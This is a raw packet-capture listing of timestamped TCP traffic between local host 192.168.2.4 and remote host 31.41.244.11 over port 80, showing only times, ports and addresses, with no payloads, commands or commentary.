Nov 5, 2024 18:46:09.832807064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832812071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832833052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832833052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832849026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832854033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832865000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832895994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832905054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.832967043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832978964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832988024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.832998037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833008051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833012104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833017111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833039999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833055019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833065033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833080053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833089113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833115101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833136082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833136082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833813906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833825111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833834887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833843946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833853006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833859921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833863020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833880901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833883047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833903074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833914995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.833965063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833976030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833986044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.833996058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834006071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834007978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834016085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834028006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834028959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834038973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834042072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834048986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834060907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834084988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834108114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834110975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834146976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834285021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834295988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834305048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834315062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834325075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834327936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834337950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834347963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834353924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834357977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834366083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834368944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834378958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834388018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834389925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834397078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834402084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834422112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834444046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834490061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834498882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834531069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834645033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834656000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834666014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834676027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834686041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834697008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834697962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834703922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834707022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834717035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834728003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834736109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834748983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834769011 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834783077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834793091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834800959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834810972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834822893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834820032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834835052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834841013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834841013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834842920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834852934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834856987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834862947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.834870100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.834898949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835033894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835042953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835053921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835062981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835064888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835072041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835081100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835087061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835091114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835108995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835131884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835262060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835272074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835282087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835292101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835295916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835303068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835316896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835318089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835330963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835345030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835354090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835377932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.835567951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835577011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835587025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835606098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835614920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835625887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835635900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835642099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835650921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835664988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.835674047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836002111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836013079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836026907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836095095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836103916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836112976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836122990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836251020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836260080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836271048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836280107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836293936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836304903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836316109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836324930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836338043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836384058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836415052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836450100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836461067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836471081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836491108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836515903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836544037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836554050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836564064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836585999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836601973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836611986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836622000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836632013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836647034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836672068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836697102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836705923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836718082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836741924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836750984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836828947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836838961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836848021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836858034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836875916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836899996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.836908102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.836951971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.885312080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.885349989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.885363102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.885374069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.885389090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.885399103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.885406971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.885462999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947165966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947176933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947181940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947225094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947236061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947246075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947257042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947266102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947293043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947293043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947367907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947384119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947392941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947403908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947415113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947419882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947443962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947464943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947566032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947577000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947586060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947592020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947596073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947601080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947607040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947616100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947622061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947629929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947633028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947664976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947664976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947875023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947885990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947911978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947922945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947927952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947933912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947943926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947951078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947951078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947954893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947964907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947974920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947979927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947985888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.947989941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.947997093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948007107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948010921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948016882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948029041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948034048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948034048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948062897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948240042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948249102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948268890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948282003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948455095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948466063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948477983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948487997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948496103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948498011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948509932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948519945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948529959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948529959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948539019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948554039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948554993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948554993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948564053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948565960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948574066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948590040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948607922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948863983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948874950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948883057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948893070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948901892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948904991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948914051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948925972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948934078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948941946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948945045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948954105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948962927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948965073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.948970079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.948973894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949017048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949023962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949028969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949040890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949050903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949054003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949059963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949075937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949075937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949076891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949086905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949094057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949099064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949105978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949109077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949119091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949130058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949136019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949141026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949156046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949161053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949168921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949177980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949189901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949192047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949192047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949193954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949204922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949213982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949215889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949222088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949225903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949235916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949248075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949266911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949286938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949851036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949862003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949872017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949882030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949892044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949901104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949912071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949918032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949918032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949918032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949922085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949932098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949935913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949942112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949951887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949958086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949968100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949973106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.949979067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.949987888 CET	80	49804	31.41.244.11	192.168.2.4
